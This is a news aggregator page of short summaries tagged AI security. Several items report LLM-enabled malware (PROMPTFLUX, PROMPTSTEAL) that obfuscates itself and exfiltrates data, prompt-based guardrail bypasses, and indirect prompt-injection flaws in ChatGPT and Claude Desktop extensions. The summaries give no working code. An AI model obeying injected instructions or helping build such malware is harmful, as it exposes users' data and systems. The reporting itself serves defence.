Tag Banner

All news with #ai security tag

Thu, November 6, 2025

Digital Health Needs Security at Its Core to Scale AI

🔒 The article argues that AI-driven digital health initiatives proved essential during COVID-19 but simultaneously exposed critical cybersecurity gaps that threaten pandemic preparedness. It warns that expansive data ecosystems, IoT devices and cloud pipelines multiply attack surfaces and that subtle AI-specific threats — including data poisoning, model inversion and adversarial inputs — can undermine public-health decisions. The author urges security by design, including zero-trust architectures, data provenance, encryption, model governance and cross-disciplinary drills so AI can deliver trustworthy, resilient public health systems.

read more →

Thu, November 6, 2025

Google: Cyber-Physical Attacks to Rise in Europe 2026

🚨 Google Cloud Security's Cybersecurity Forecast 2026 warns of a rise in cyber-physical attacks across EMEA targeting energy grids, transport and digital infrastructure. The report highlights increased state-sponsored espionage from Russia and China and anticipates these operations may form hybrid warfare combined with information operations to erode public trust. It also flags supply-chain compromises of managed service providers and software dependencies, and notes that cybercrime — including ransomware aimed at ERP systems — will remain a major disruptive threat to ICS/OT. Analysts further expect adversaries to increasingly leverage AI and multimodal deepfakes.

read more →

Thu, November 6, 2025

Google: LLMs Employed Operationally in Malware Attacks

🤖 Google’s Threat Intelligence Group (GTIG) reports attackers are using “just‑in‑time” AI—LLMs queried during execution—to generate and obfuscate malicious code. Researchers identified two families, PROMPTSTEAL and PROMPTFLUX, which query Hugging Face and Gemini APIs to craft commands, rewrite source code, and evade detection. GTIG also documents social‑engineering prompts that trick models into revealing red‑teaming or exploit details, and warns the underground market for AI‑enabled crime is maturing. Google says it has disabled related accounts and applied protections.

read more →

Thu, November 6, 2025

Forrester's 2026 Predictions: CIOs and CISOs on Alert

🔍 Forrester warns that 2026 will demand precision, resilience and strategic foresight from CIOs and CISOs as volatility persists and the AI hype phase gives way to a results-driven era. Leaders will face rising pressure to deliver measurable, secure outcomes from AI initiatives while managing vendor promises, postponements and tighter financial scrutiny. Neocloud growth, talent bottlenecks and accelerating quantum risk will further complicate planning and force cross-functional governance.

read more →

Wed, November 5, 2025

Vertex AI Agent Builder: Build, Scale, Govern Agents

🚀 Vertex AI Agent Builder is Google Cloud's integrated platform to build, scale, and govern production AI agents. The update expands the Agent Development Kit (ADK) and Agent Engine with configurable context layers to reduce token usage, an adaptable plugins framework, and new language SDK support including Go. Production features include observability, evaluation tools, simplified deployment via the ADK CLI, and strengthened governance with native agent identities and Model Armor protections.

read more →

Wed, November 5, 2025

Google: PROMPTFLUX malware uses Gemini to self-write

🤖 Google researchers disclosed a VBScript threat named PROMPTFLUX that queries Gemini via a hard-coded API key to request obfuscated VBScript designed to evade static detection. A 'Thinking Robot' component logs AI responses to %TEMP% and writes updated scripts to the Windows Startup folder to maintain persistence. Samples include propagation attempts to removable drives and mapped network shares, and variants that rewrite their source on an hourly cadence. Google assesses the malware as experimental and currently lacking known exploit capabilities.

read more →

Wed, November 5, 2025

Google: New AI-Powered Malware Families Deployed

⚠️Google's Threat Intelligence Group reports a surge in malware that integrates large language models to enable dynamic, mid-execution changes—what Google calls "just-in-time" self-modification. Notable examples include the experimental PromptFlux VBScript dropper and the PromptSteal data miner, plus operational threats like FruitShell and QuietVault. Google disabled abused Gemini accounts, removed assets, and is hardening model safeguards while collaborating with law enforcement.

read more →

Wed, November 5, 2025

GTIG Report: AI-Enabled Threats Transform Cybersecurity

🔒 The Google Threat Intelligence Group (GTIG) released a report documenting a clear shift: adversaries are moving beyond benign productivity uses of AI and are experimenting with AI-enabled operations. GTIG observed state-sponsored actors from North Korea, Iran and the People's Republic of China using AI for reconnaissance, tailored phishing lure creation and data exfiltration. Threats described include AI-powered, self-modifying malware, prompt-engineering to bypass safety guardrails, and underground markets selling advanced AI attack capabilities. Google says it has disrupted malicious assets and applied that intelligence to strengthen classifiers and its AI models.

read more →

Wed, November 5, 2025

GTIG report: Adversaries adopt AI for advanced attacks

⚠️ The Google Threat Intelligence Group (GTIG) reports that adversaries are evolving beyond simple productivity uses of AI toward operational misuse. Observed behaviors include state-sponsored actors from North Korea, Iran and the People's Republic of China using AI for reconnaissance, automated phishing lure creation and data exfiltration. The report documents AI-powered malware that can generate and modify malicious scripts in real time and attackers exploiting deceptive prompts to bypass model guardrails. Google says it has disabled assets linked to abuse and applied intelligence to improve classifiers and harden models against misuse.

read more →

Wed, November 5, 2025

Lack of AI Training Becoming a Major Security Risk

⚠️ A majority of German employees already use AI at work, with 62% reporting daily use of generative tools such as ChatGPT. Adoption has been largely grassroots—31% began using AI independently and nearly half learned via videos or informal study. Although 85% deem training on AI and data protection essential, 25% report no security training and 47% received only informal guidance, leaving clear operational and data risks.

read more →

Wed, November 5, 2025

Researchers Find ChatGPT Vulnerabilities in GPT-4o/5

🛡️ Cybersecurity researchers disclosed seven vulnerabilities in OpenAI's GPT-4o and GPT-5 models that enable indirect prompt injection attacks to exfiltrate user data from chat histories and stored memories. Tenable researchers Moshe Bernstein and Liv Matan describe zero-click search exploits, one-click query execution, conversation and memory poisoning, a markdown rendering bug, and a safety bypass using allow-listed Bing links. OpenAI has mitigated some issues, but experts warn that connecting LLMs to external tools broadens the attack surface and that robust safeguards and URL-sanitization remain essential.

read more →

Wed, November 5, 2025

Addressing the AI Black Box with Prisma AIRS 2.0 Platform

🔒 Prisma AIRS 2.0 presents a unified AI security platform that addresses the “AI black box” by combining AI Model Security and automated AI Red Teaming. It inventories models, inference datasets, applications and agents in real time, inspects model artifacts within CI/CD and model registries, and conducts continuous, context-aware adversarial testing. The platform integrates curated threat intelligence and governance mappings to deliver auditable risk scores and prioritized remediation guidance for enterprise teams.

read more →

Wed, November 5, 2025

GTIG: Threat Actors Shift to AI-Enabled Runtime Malware

🔍 Google Threat Intelligence Group (GTIG) reports an operational shift from adversaries using AI for productivity to embedding generative models inside malware to generate or alter code at runtime. GTIG details “just-in-time” LLM calls in families like PROMPTFLUX and PROMPTSTEAL, which query external models such as Gemini to obfuscate, regenerate, or produce one‑time functions during execution. Google says it disabled abusive assets, strengthened classifiers and model protections, and recommends monitoring LLM API usage, protecting credentials, and treating runtime model calls as potential live command channels.

read more →

Wed, November 5, 2025

Cloud CISO: Threat Actors' Growing Use of AI Tools

⚠️Google's Threat Intelligence team reports a shift from experimentation to operational use of AI by threat actors, including AI-enabled malware and prompt-based command generation. GTIG highlighted PROMPTSTEAL, linked to APT28 (FROZENLAKE), which queries a Hugging Face LLM to generate scripts for reconnaissance, document collection, and exfiltration, while adopting greater obfuscation and altered C2 methods. Google disabled related assets, strengthened model classifiers and safeguards with DeepMind, and urges defenders to update threat models, monitor anomalous scripting and C2, and incorporate threat intelligence into model- and classifier-level protections.

read more →

Wed, November 5, 2025

Scientists Need a Positive Vision for Artificial Intelligence

🔬 While many researchers view AI as exacerbating misinformation, authoritarian tools, labor exploitation, environmental costs, and concentrated corporate power, the essay argues that resignation is not an option. It highlights concrete, beneficial applications—language access, AI-assisted civic deliberation, climate dialogue, national-lab research models, and advances in biology—while acknowledging imperfections. Drawing on Rewiring Democracy, the authors call on scientists to reform industry norms, document abuses, responsibly deploy AI for public benefit, and retrofit institutions to manage disruption.

read more →

Wed, November 5, 2025

Securing the Open Android Ecosystem with Samsung Knox

🔒 Samsung Knox is a built-in security platform for Samsung Galaxy devices that combines hardware- and software-level protections to safeguard enterprise data and provide IT teams with centralized control. It layers defenses — including AI-powered malware detection, curated app controls, Message Guard for zero-click image scanning, and DEFEX exploit detection — while integrating with EMMs and offering granular update management via Knox E-FOTA. The platform emphasizes visibility, policy enforcement, and predictable lifecycle management to reduce risk and operational disruption.

read more →

Wed, November 5, 2025

Prompt Injection Flaw in Anthropic Claude Desktop Exts

🔒Anthropic's official Claude Desktop extensions for Chrome, iMessage and Apple Notes were found vulnerable to web-based prompt injection that could enable remote code execution. Koi Security reported unsanitized command injection in the packaged Model Context Protocol (MCP) servers, which run unsandboxed on users' devices with full system permissions. Unlike browser extensions, these connectors can read files, execute commands and access credentials. Anthropic released a fix in v0.1.9, verified by Koi Security on September 19.

read more →

Wed, November 5, 2025

Microsoft Expands Sovereign Cloud Capabilities, EU Focus

🛡️ Microsoft announced expanded sovereign cloud offerings aimed at helping governments and enterprises meet regulatory and resilience requirements across Europe and beyond. The update includes end-to-end AI data processing within an EU Data Boundary, expanded Microsoft 365 Copilot in-country processing to 15 countries and additional rollouts through 2026, plus a refreshed Sovereign Landing Zone for simplified deployment of sovereign controls. Azure Local gains increased scale, external SAN support, and NVIDIA RTX Pro 6000 Blackwell GPUs for high-performance on-prem AI, along with planned disconnected operations. A new Digital Sovereignty specialization gives partners a way to validate and badge their sovereign-cloud expertise.

read more →

Wed, November 5, 2025

10 Promising Cybersecurity Startups CISOs Should Know

🔒 This roundup profiles ten cybersecurity startups founded in 2020 or later that CISOs should watch, chosen for funding, leadership, customer traction, and strategic clarity. It highlights diverse categories including non-human identity, software supply chain, data security posture, and AI agent security. Notable vendors such as Astrix, Chainguard, Cyera, and Drata have raised substantial capital and achieved rapid enterprise adoption. The list underscores investor enthusiasm and the rise of runtime‑focused and agentic defenses.

read more →

Wed, November 5, 2025

CrowdStrike Expands Agentic Security Workforce With Agents

🤖 CrowdStrike announced new specialized agents and an orchestration layer designed to accelerate SOC operations and automation. The launch includes a Data Onboarding Agent, a Foundry App Creation Agent, and an updated Exposure Prioritization Agent to simplify pipeline creation, app development, and continuous authenticated scanning. Integrated with Charlotte Agentic SOAR and Charlotte AI, these agents enable coordinated, machine-speed workflows while keeping analysts in control.

read more →